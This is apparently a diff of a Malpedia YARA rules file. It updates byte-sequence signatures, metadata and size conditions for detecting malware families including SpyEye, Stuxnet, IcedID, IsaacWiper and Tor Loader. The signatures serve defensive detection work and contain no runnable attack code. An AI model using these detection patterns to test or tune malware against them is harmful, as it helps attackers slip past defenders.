-		logic_hash = "f52122f494b07ec03552d51c6b0687cd994e16514778e5ef2160e099630dd732"
+		logic_hash = "67a7f7312503fc884654411fbd541d429d107c00f30e61663f00f8de9ff4e54f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102077,32 +102228,32 @@ rule MALPEDIA_Win_Proto8_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4730 452bf7 412bc1 452bf4 443bf0 458bee 440f43e8 }
-		$sequence_1 = { 7454 488b0b 4885c9 742b 488b8100020000 48c70000000000 b801000000 }
-		$sequence_2 = { 488d4c2458 493bfd 480f43cb 4c8bc6 4c3bf6 4d0f42c6 e8???????? }
-		$sequence_3 = { c744243001000000 488b7308 488b2b 48c744242002000000 4c8d0de0db0500 488bd6 488bcd }
-		$sequence_4 = { 75b3 448b542430 4183f873 0f8400feffff 488b4c2470 ffc3 413bda }
-		$sequence_5 = { f6c314 7424 c1eb02 450fb6ce 80e301 4c8bc6 488bd7 }
-		$sequence_6 = { 83f803 0f85cd000000 4584ed 751c 8d43ff 443bd8 7407 }
-		$sequence_7 = { 894310 4585f6 7510 418d7e01 448bfe 89bc24b8000000 eb12 }
-		$sequence_8 = { e8???????? 85c0 750a c744242804000000 eb14 89442420 c744242401000000 }
-		$sequence_9 = { 48c744243800000000 4c8bc8 48894c2430 4c8bc7 488d4c2460 48894c2428 33c9 }
+		$sequence_0 = { e8???????? 488d05f2573000 bb02000000 e8???????? 488b842420010000 488b4c2440 4829c8 }
+		$sequence_1 = { e8???????? 833d????????00 750b 488b542470 48894218 eb1b 488b7c2470 }
+		$sequence_2 = { eb0c c6441c5000 48ffcb 0f1f4000 4839da 7f81 4883fb10 }
+		$sequence_3 = { ebaf 488b542450 4c8b442448 4c39c2 488b942490000000 7d0c 4c8d0d97051200 }
+		$sequence_4 = { eb0c 488d3da3fb3200 e8???????? 488b0d???????? 48898c24f0030000 488d0500bc0900 e8???????? }
+		$sequence_5 = { f7d7 4121ff 488b8424d0000000 488b4c2458 488b742448 488bbc2488000000 4c8b442438 }
+		$sequence_6 = { e8???????? 84c0 0f85e5000000 0fb644243f e8???????? 4889442468 48895c2460 }
+		$sequence_7 = { e8???????? 488b842490000000 6690 e8???????? 488d051d533100 bb0f000000 e8???????? }
+		$sequence_8 = { e8???????? 488d05291f3300 bb20000000 0f1f440000 e8???????? 488d05f31e3300 bb20000000 }
+		$sequence_9 = { e8???????? 90 8b9424c0000000 83fa7f 7746 49ffc0 4c39c1 }
 
 	condition:
-		7 of them and filesize < 2537472
+		7 of them and filesize < 13050880
 }
-rule MALPEDIA_Win_Project_Wood_Auto : FILE
+rule MALPEDIA_Win_Bouncer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eadfb598-e06d-536a-8983-e068733d6495"
+		id = "5fe05fe3-5ba6-5402-bae1-03809aced05d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.project_wood"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.project_wood_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bouncer_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "92c5f7de9849db3abd82c6a5e3e8ba38f7353d944f46cacae8fc567f574f0ddc"
+		logic_hash = "ffbe1b49339388f6599ff4eb536b18862d27897734fc35260ae1ce6cc8930ed7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102116,34 +102267,34 @@ rule MALPEDIA_Win_Project_Wood_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? eb0e 83bd18ffffff01 7513 68???????? 8d86ad000000 }
-		$sequence_1 = { 8bf8 8d45cc 57 897de4 ff75e0 56 53 }
-		$sequence_2 = { 50 ff15???????? a810 0f8526010000 8d45d8 50 }
-		$sequence_3 = { a1???????? 33c9 40 8acf 3bc6 88887f5fe810 a3???????? }
-		$sequence_4 = { 50 ff7508 e8???????? 83c41c 33c0 8dbdedfeffff 889decfeffff }
-		$sequence_5 = { 50 e8???????? 68???????? e8???????? 40 68???????? 018614090000 }
-		$sequence_6 = { e8???????? 8b4de0 b8a3010000 83c40c 3bc8 0f87c8000000 0f84ae000000 }
-		$sequence_7 = { 8d85c8fcffff 68???????? 50 ff15???????? 83c410 8d45ec }
-		$sequence_8 = { 50 e8???????? 68???????? e8???????? 01861c090000 8b861c090000 8d8de8fcffff }
-		$sequence_9 = { 56 e8???????? 83c448 8d45e4 6a14 53 50 }
+		$sequence_0 = { ff15???????? 3bc3 0f84dd060000 8b4de4 }
+		$sequence_1 = { ff30 ff15???????? 39750c 50 }
+		$sequence_2 = { 50 8d8584fdffff 50 ff760c ff15???????? 85c0 }
+		$sequence_3 = { bfc8000000 8d8534ffffff 57 50 ff36 }
+		$sequence_4 = { e9???????? 80f912 7533 6a08 6a08 ff15???????? 50 }
+		$sequence_5 = { 57 8b30 56 e8???????? 8b3d???????? 59 bbc8000000 }
+		$sequence_6 = { 03c7 50 ff7508 e8???????? 83f8ff 0f8406010000 }
+		$sequence_7 = { a1???????? 8b3d???????? 3bc6 7404 50 ffd7 59 }
+		$sequence_8 = { 8945ec 8d45f0 c745ac44000000 50 8d45ac 50 56 }
+		$sequence_9 = { 8b8485a064ffff 3b45cc 0f8cbe090000 40 8945cc e9???????? 80f902 }
 
 	condition:
-		7 of them and filesize < 31137792
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Unidentified_006_Auto : FILE
+rule MALPEDIA_Elf_Gobrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1d29f273-95a4-58bd-87cd-6ac677036b5c"
+		id = "9cb05d8e-88df-5069-9152-096fc77aac24"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_006_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gobrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.gobrat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "dd723dd2c53afa22a9c28d9c9c06ec724a63cc0cfcf78b59a425b4cdf0fd8bc1"
-		score = 75
-		quality = 75
+		logic_hash = "29d6047280b8adce38a5f6a7e3d8112ab4747228198bdfc531ab746feecbff32"
+		score = 60
+		quality = 35
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -102155,32 +102306,32 @@ rule MALPEDIA_Win_Unidentified_006_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3907 7417 833e00 7408 ff36 e8???????? 59 }
-		$sequence_1 = { 6a00 8d45fc 897dfc 50 8d45f8 50 6a00 }
-		$sequence_2 = { 85c9 7410 8b55f4 85d2 7409 e8???????? 894708 }
-		$sequence_3 = { 8bf0 57 56 e8???????? 83c410 33c0 }
-		$sequence_4 = { 85f6 7410 57 8b7d0c 2bf8 }
-		$sequence_5 = { 0fb6875c204000 47 03c6 83c603 25ff000000 }
-		$sequence_6 = { eb45 8b7510 85f6 743c }
-		$sequence_7 = { 8b4dfc 83c40c 8bf7 8bd7 85c9 7421 83ff0c }
-		$sequence_8 = { 33ff 53 ff15???????? 53 ff15???????? }
-		$sequence_9 = { 57 6a40 8bc2 33ff 6800300000 50 }
+		$sequence_0 = { e8???????? 4889fa e9???????? 488d842400010000 488d1d22cf1700 b90b000000 488bbc2420020000 }
+		$sequence_1 = { e8???????? 488b842408010000 488b9c2400010000 488b4c2468 e8???????? e9???????? 4883f917 }
+		$sequence_2 = { 8d3431 8d76c6 0f1f440000 4883fa06 0f83bf000000 440fb644145c 4131f0 }
+		$sequence_3 = { e8???????? 488b5c2460 e8???????? 488b6c2448 4883c450 c3 4889442408 }
+		$sequence_4 = { e8???????? 488d3d2cd23b00 e8???????? 488b6c2478 4883ec80 c3 4889ca }
+		$sequence_5 = { ebd5 31f6 90 e8???????? ebcb 498b5010 4839d1 }
+		$sequence_6 = { e8???????? 488b442430 48ffc0 488b5c2420 4883c3fe 488b9424a8010000 488bb42458010000 }
+		$sequence_7 = { f20f10442428 f20f5e05???????? f20f114040 488b542450 6690 4883fa08 7e3f }
+		$sequence_8 = { e8???????? 6690 4885c9 0f8578010000 488d0d90371500 4839c8 7505 }
+		$sequence_9 = { e8???????? 488b6d00 488d05225c0500 488d4c2470 e8???????? 31c0 eb28 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 12853248
 }
-rule MALPEDIA_Win_Spyeye_Auto : FILE
+rule MALPEDIA_Win_Stuxnet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7c62579-def8-5f0a-826a-88762a729bf5"
+		id = "9c448caf-a5e3-53e6-be9a-4aa45334f7d3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spyeye_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stuxnet_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f4149a2d0558cdca789e55a3da096c9eb02a06e0cbb6c5f6412ffac38db590ec"
+		logic_hash = "2029a68bba02441740da4f3ef9a391375e59b29e674666cb41a7f24fda7b29c9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102194,34 +102345,34 @@ rule MALPEDIA_Win_Spyeye_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81fbffffff7f 7509 56 57 e8???????? 8bd8 3bde }
-		$sequence_1 = { 740e 8965fc ff750c ff7508 ffd0 8b65fc c9 }
-		$sequence_2 = { 751b 57 6800000002 6a03 }
-		$sequence_3 = { 7414 8965fc ff7514 ff7510 }
-		$sequence_4 = { 50 57 e8???????? 8b5d14 33f6 3bde }
-		$sequence_5 = { 53 56 57 33ff 57 be80000000 56 }
-		$sequence_6 = { 56 57 e8???????? 57 8bf0 e8???????? 8bc6 }
-		$sequence_7 = { 6a03 57 6a01 56 ff750c }
-		$sequence_8 = { 740e 837dfcff 7408 ff75fc e8???????? 3bdf }
-		$sequence_9 = { 55 8bec 51 68b787554d }
+		$sequence_0 = { e8???????? ff7508 8b45ec 8b4008 ff75f0 03c6 50 }
+		$sequence_1 = { a1???????? 85c0 7507 b805400080 eb39 56 ff7518 }
+		$sequence_2 = { ff760c e8???????? 59 6bdb38 8b4508 03d8 895e14 }
+		$sequence_3 = { e8???????? eb08 ff7508 e8???????? 59 8b4df4 64890d00000000 }
+		$sequence_4 = { b8???????? c3 b8???????? e8???????? 56 8b7508 57 }
+		$sequence_5 = { 6a24 e8???????? 59 8945ec 33f6 46 8975fc }
+		$sequence_6 = { e8???????? 84c0 744b 68???????? 8d442440 50 e8???????? }
+		$sequence_7 = { e8???????? 8945ec 8d45a8 50 e8???????? 8365fc00 8d45c4 }
+		$sequence_8 = { ff75e8 ff15???????? 3bc3 7505 e8???????? ffd0 85c0 }
+		$sequence_9 = { 8d55d8 52 ff7510 ff750c ff7508 51 50 }
 
 	condition:
-		7 of them and filesize < 741376
+		7 of them and filesize < 2495488
 }
-rule MALPEDIA_Win_Syscon_Auto : FILE
+rule MALPEDIA_Win_Nspx30_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "62914e2c-226d-5cbb-90b0-89a5b7c1ce63"
+		id = "47a5f87a-bd45-5a39-bf1f-2280475ca3dc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.syscon_auto.yar#L1-L179"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nspx30"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nspx30_auto.yar#L1-L307"
 		license_url = "N/A"
-		logic_hash = "302ef373551197e8ed957c8603c0bcf0757f29f0db7a8e8349d7ddb01c77aa30"
+		logic_hash = "60a2afbb46ed2d066c5213f1fddc7a9e909463149f91997e5d932b09b46a1178"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -102233,38 +102384,53 @@ rule MALPEDIA_Win_Syscon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a00 6a00 6a01 6a00 ff15???????? a3???????? }
-		$sequence_1 = { 68???????? 68???????? 8818 ff15???????? 68???????? ffd6 53 }
-		$sequence_2 = { 52 8845ff ffd7 0fb64e02 ba???????? 51 2ac2 }
-		$sequence_3 = { ffd3 83f8ff 74d3 50 ff15???????? 8d442418 }
-		$sequence_4 = { 898424d80b0000 53 56 57 8b3d???????? }
-		$sequence_5 = { 68???????? 57 ffd3 8bf0 8bd6 2bd7 42 }
-		$sequence_6 = { 55 8bec 8b4508 48 7458 83e803 }
-		$sequence_7 = { 53 68???????? 53 53 891d???????? ff15???????? }
-		$sequence_8 = { ff15???????? 488d542420 488d0df6500000 448bc0 e8???????? 488d542420 }
-		$sequence_9 = { 41be01000000 488b9dd00f0000 488d9560030000 498bcd ff15???????? }
-		$sequence_10 = { ff15???????? 488905???????? 4885c0 0f845af5ffff }
-		$sequence_11 = { 4c89742440 4c89742438 c744243000000008 4489742428 4c89742420 ff15???????? 488b8d700c0000 }
-		$sequence_12 = { ff15???????? 488d9520040000 488d0dd32e0000 448bc0 e8???????? 488d5590 }
-		$sequence_13 = { e8???????? 488d9560010000 488d4c2450 e8???????? e9???????? 48895c2408 4889742410 }
-		$sequence_14 = { 0fb7542466 440fb75c246c 0fb744246a 440fb74c2462 44895c2438 89442430 }
-		$sequence_15 = { 488d8d10020000 ff15???????? 488d4d90 448bc3 33d2 }
+		$sequence_0 = { f3ab 66ab aa b06c }
+		$sequence_1 = { 0f8794000000 8088c166001004 40 ebee 8365fc00 }
+		$sequence_2 = { c644240e6e c644240f64 c64424106f c644241177 c644241273 88542413 }
+		$sequence_3 = { 6689842424010000 66899c2426010000 6689ac2428010000 6689bc242a010000 668984242c010000 66c784242e0100003200 6689842430010000 }
+		$sequence_4 = { 55 8bec 8b4508 56 833c850061001000 8d348500610010 753e }
+		$sequence_5 = { ff15???????? 83c8ff 5e c20800 6879270000 ff15???????? 83c8ff }
+		$sequence_6 = { 8d7c2410 83c9ff 33c0 83c404 f2ae }
+		$sequence_7 = { 33d2 b940000000 33c0 8d7c2415 88542414 f3ab 66ab }
+		$sequence_8 = { 756c 8d84241c010000 68???????? 50 ffd6 }
+		$sequence_9 = { a3???????? 5d c3 ff15???????? 33c9 }
+		$sequence_10 = { 0c01 88443124 eb34 80c980 884c3704 8b0c9d384c0410 8a443124 }
+		$sequence_11 = { 7c00 10547c00 10767c 0010 d07c0010 a0???????? 7c00 }
+		$sequence_12 = { aa b06c 6804010000 8844240c }
+		$sequence_13 = { 8bf8 8b4508 8d34c6 8d450c 50 }
+		$sequence_14 = { 85c0 0f8475010000 85ff 0f846d010000 ba42000000 6a00 }
+		$sequence_15 = { 66c78424ee0000003a00 66c78424f00000007b00 66c78424f20000004600 6689bc24f8000000 66898c24fa000000 66899424fc000000 }
+		$sequence_16 = { 03cb e8???????? f30f7e442414 660fd600 f30f7e44241c }
+		$sequence_17 = { 8a02 83f078 05ae000000 25ff000080 7907 }
+		$sequence_18 = { 88441905 8b0c95384c0410 8a45f9 88441925 8b0495384c0410 6a0a 59 }
+		$sequence_19 = { 50 c785f8fcffff9c000000 ff15???????? 85c0 0f85a6000000 8d85f8fcffff }
+		$sequence_20 = { b801000000 5b 81c410030000 c20c00 5f 5e 33c0 }
+		$sequence_21 = { 6800300000 6854130000 53 50 ff15???????? 8bd0 }
+		$sequence_22 = { c644241e69 c644241f74 c644242050 c644242172 c64424226f c644242363 885c2424 }
+		$sequence_23 = { 8945a0 681bc64679 8b55f8 52 }
+		$sequence_24 = { c7459400000000 c745ec00000000 eb09 8b45ec }
+		$sequence_25 = { 8b08 8b55e0 895134 8b450c 50 8b4dfc }
+		$sequence_26 = { 8bd8 8b6c2418 85ed 762a 8b4c241c 51 55 }
+		$sequence_27 = { 57 b904000000 bf???????? 33c0 f3a7 }
+		$sequence_28 = { a880 741d 8b4b24 85c9 7616 8b4fe4 }
+		$sequence_29 = { 8b4dfc 890d???????? 8b15???????? 813a0c010000 730e c705????????00000000 33c0 }
+		$sequence_30 = { 8d7c240c 83c9ff 33c0 c644240c57 c644240d69 }
 
 	condition:
-		7 of them and filesize < 120832
+		7 of them and filesize < 3789824
 }
-rule MALPEDIA_Win_Icedid_Downloader_Auto : FILE
+rule MALPEDIA_Win_Photofork_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a6a24661-a781-5517-9bde-5f4ae21f58dc"
+		id = "ceb1cb1f-8247-52bb-81a3-fc6627c948bc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.icedid_downloader_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photofork"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.photofork_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "8833f99bb1bd77711eb78fc1bd4033ed964a1a4a33594d443cf638144662738b"
+		logic_hash = "55c8708d569da20398deafe5dc1cb0108f4fd9e562f2f0448ff6d194ec946bbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102278,34 +102444,34 @@ rule MALPEDIA_Win_Icedid_Downloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 57 ff742430 ff5660 }
-		$sequence_1 = { 8bd8 85db 7413 6a01 56 }
-		$sequence_2 = { 6a01 6a08 6689742434 ff15???????? 68???????? 89442434 }
-		$sequence_3 = { 0ad8 885c2418 45 83c708 3b2e }
-		$sequence_4 = { ff7010 ff75f4 e8???????? 83c410 8bd8 ff75ec ff15???????? }
-		$sequence_5 = { 8d442428 50 ff742438 ff15???????? 8d442440 50 68???????? }
-		$sequence_6 = { ff15???????? 6a05 5b 8d4554 c7450001000000 50 }
-		$sequence_7 = { 6a0b 58 668945c4 8d75d4 33c0 c745dc00330000 6a16 }
-		$sequence_8 = { b805400080 eb76 ff7508 ff15???????? }
-		$sequence_9 = { 50 8d45d4 66895d04 50 57 }
+		$sequence_0 = { 57 4154 4156 488bec 4883ec50 33ff }
+		$sequence_1 = { 48ffc1 4883f903 72ea 458bcd }
+		$sequence_2 = { 488981e0100000 eb12 ba01000000 33c9 }
+		$sequence_3 = { 8b4544 0fb64540 84c0 750b }
+		$sequence_4 = { 4c8d45c4 eb72 488b05???????? 4885c0 742c 488b8080010000 }
+		$sequence_5 = { 488b05???????? 4c895048 41b904000000 41b800300000 488bd6 33c9 41ffd2 }
+		$sequence_6 = { d3c8 ffc0 418900 488b7c2428 4c3b4c2430 }
+		$sequence_7 = { c60100 488d4901 4883e801 75f3 488b15???????? 4885d2 }
+		$sequence_8 = { 8b44246c 0fb6442468 84c0 7520 }
+		$sequence_9 = { 4d8b00 488b09 4889442420 e8???????? 488b9c24b8000000 3dc8000000 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 99328
 }
-rule MALPEDIA_Win_Isaacwiper_Auto : FILE
+rule MALPEDIA_Win_Suppobox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "49055172-29cc-5c36-b567-edf9c776fb50"
+		id = "177ef819-f180-537c-8a5b-50145cc2ea86"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.isaacwiper_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.suppobox_auto.yar#L1-L191"
 		license_url = "N/A"
-		logic_hash = "9dc7297f4b8c766d788d99fcb182487835c35f1c6c8fa9d0d296f8378105b942"
+		logic_hash = "a5e7699d7d2692f12be7c31662694dcf4bf84741bea11b2882b9a09666e09210"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -102317,32 +102483,44 @@ rule MALPEDIA_Win_Isaacwiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48 0300 2448 0300 3448 0300 }
-		$sequence_1 = { 8d942498130000 8d8c24f0000000 e8???????? 84c0 0f84df0a0000 }
-		$sequence_2 = { 8b7514 8d442418 8b7c2414 ff7614 6a00 50 57 }
-		$sequence_3 = { 55 8bec 8b4508 56 57 8d3c8520650310 }
-		$sequence_4 = { 8d442420 56 0f43442424 50 }
-		$sequence_5 = { c70700000000 8b7dfc c70200000000 5b 894740 }
-		$sequence_6 = { 6bd738 8b0c8de8670310 c644112800 85f6 740c }
-		$sequence_7 = { 57 52 ba0a020000 8d8d90fbffff }
-		$sequence_8 = { 89842488000000 8d8424c0000000 50 c7460800000000 }
-		$sequence_9 = { 8b4804 8d41f8 89443194 8b4688 8b4004 c744308898270310 8b4688 }
+		$sequence_0 = { 3bc8 7d10 a1???????? 2b05???????? }
+		$sequence_1 = { 7412 8b0d???????? 030d???????? 890d???????? }
+		$sequence_2 = { 7412 a1???????? 2b05???????? a3???????? }
+		$sequence_3 = { 8945f0 a1???????? 83e801 a3???????? }
+		$sequence_4 = { 7e10 a1???????? 0305???????? a3???????? }
+		$sequence_5 = { 7d10 a1???????? 3305???????? a3???????? }
+		$sequence_6 = { 890d???????? e8???????? 8bf0 e8???????? 03f0 }
+		$sequence_7 = { 01c6 39fe 0f8d2f020000 80bc2ef4f7ffff0a }
+		$sequence_8 = { 01c6 ebdb ff7510 57 }
+		$sequence_9 = { 8d4801 83c601 39f7 898b00010000 881403 }
+		$sequence_10 = { 8d4801 894ddc 0fbf4dd4 01c8 }
+		$sequence_11 = { 01c6 39fe 0f8d7e010000 80bc2ef4f7ffff0a }
+		$sequence_12 = { 8d4801 894e0c 0fb65001 80fa5f 0f94c3 }
+		$sequence_13 = { 01bdacf7ffff 83c40c 83bdc8f7ffff00 8b95c8f7ffff }
+		$sequence_14 = { 8d4801 890d???????? 8d8402199951bd dd8500f9ffff }
+		$sequence_15 = { 8d4801 8d8402ec432105 3d182b4547 890d???????? }
+		$sequence_16 = { 01d7 68???????? 57 e8???????? }
+		$sequence_17 = { 8d4801 83c601 39fe 898b00010000 }
+		$sequence_18 = { 8d4801 83c601 81fe???????? 898b00010000 }
+		$sequence_19 = { 01c9 4a 79f2 833b54 }
+		$sequence_20 = { 01d8 3b85b0f7ffff 7e2f 8b95c8f7ffff }
+		$sequence_21 = { 019dacf7ffff 83c40c 299dc4f7ffff e9???????? }
 
 	condition:
-		7 of them and filesize < 467968
+		7 of them and filesize < 1875968
 }
-rule MALPEDIA_Win_Tor_Loader_Auto : FILE
+rule MALPEDIA_Win_Qadars_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "97401572-684c-58d7-8ba8-1e13d7e2a1eb"
+		id = "0a2bf787-2e79-532d-b549-325462dde16c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tor_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tor_loader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.qadars_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "67a7f7312503fc884654411fbd541d429d107c00f30e61663f00f8de9ff4e54f"
+		logic_hash = "1b2a593b94764cfdb9793ab67d53c7287007841a19e7fe336bf33e3d401fbe52"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102356,71 +102534,77 @@ rule MALPEDIA_Win_Tor_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 488d05f2573000 bb02000000 e8???????? 488b842420010000 488b4c2440 4829c8 }
-		$sequence_1 = { e8???????? 833d????????00 750b 488b542470 48894218 eb1b 488b7c2470 }
-		$sequence_2 = { eb0c c6441c5000 48ffcb 0f1f4000 4839da 7f81 4883fb10 }
-		$sequence_3 = { ebaf 488b542450 4c8b442448 4c39c2 488b942490000000 7d0c 4c8d0d97051200 }
-		$sequence_4 = { eb0c 488d3da3fb3200 e8???????? 488b0d???????? 48898c24f0030000 488d0500bc0900 e8???????? }
-		$sequence_5 = { f7d7 4121ff 488b8424d0000000 488b4c2458 488b742448 488bbc2488000000 4c8b442438 }
-		$sequence_6 = { e8???????? 84c0 0f85e5000000 0fb644243f e8???????? 4889442468 48895c2460 }
-		$sequence_7 = { e8???????? 488b842490000000 6690 e8???????? 488d051d533100 bb0f000000 e8???????? }
-		$sequence_8 = { e8???????? 488d05291f3300 bb20000000 0f1f440000 e8???????? 488d05f31e3300 bb20000000 }
-		$sequence_9 = { e8???????? 90 8b9424c0000000 83fa7f 7746 49ffc0 4c39c1 }
+		$sequence_0 = { 33c0 eb05 8b11 8b0482 8bce 83e11f }
+		$sequence_1 = { 891481 40 3b4608 72f2 8b06 50 e8???????? }
+		$sequence_2 = { 75f8 8b07 50 e8???????? 57 e8???????? 83c408 }
+		$sequence_3 = { 57 c1e805 83e11f 33ff }
+		$sequence_4 = { 5e 5b c3 85f6 7427 8b4604 85c0 }
+		$sequence_5 = { 8b4114 2b410c 5f 03c6 03450c }
+		$sequence_6 = { 837e0c00 7405 015e0c eb31 85f6 742d }
+		$sequence_7 = { 0fb64d0c 8345fc03 8bd1 c1ea02 0fb6841578ffffff 0fb6550d 8807 }
+		$sequence_8 = { 6a00 8d4df4 51 6a04 8d55f8 }
+		$sequence_9 = { 6a01 6a08 ff15???????? 83c408 }
+		$sequence_10 = { 6a01 8b55fc 52 ff15???????? 83c408 }
+		$sequence_11 = { 83c40c 6805010000 8d8df8feffff 51 }
+		$sequence_12 = { 51 8b55f0 52 ff15???????? 83c40c }
+		$sequence_13 = { 83c408 83c001 8985c8fcffff 8d95f0feffff 8995c4fcffff }
+		$sequence_14 = { 83c408 83f801 0f85a5000000 6a00 }
+		$sequence_15 = { 83c408 83c8ff e9???????? eb1d 8b4d10 }
 
 	condition:
-		7 of them and filesize < 13050880
+		7 of them and filesize < 630784
 }
-rule MALPEDIA_Win_Unidentified_081_Auto : FILE
+rule MALPEDIA_Win_Skyplex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4bef4e35-3450-5f50-98ad-424279417112"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_081_auto.yar#L1-L125"
+		id = "7314bd82-1aa5-5733-8a6b-d66b1f4ce931"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.skyplex_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "0bf113d92abe743278ae5a94b3d8f7a48f5ba7f91d2e79f1d3ac361b6c786f4e"
+		logic_hash = "192b51867743844243ec787078ffba7934aed43d773432d484ad42af9f8ba5ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
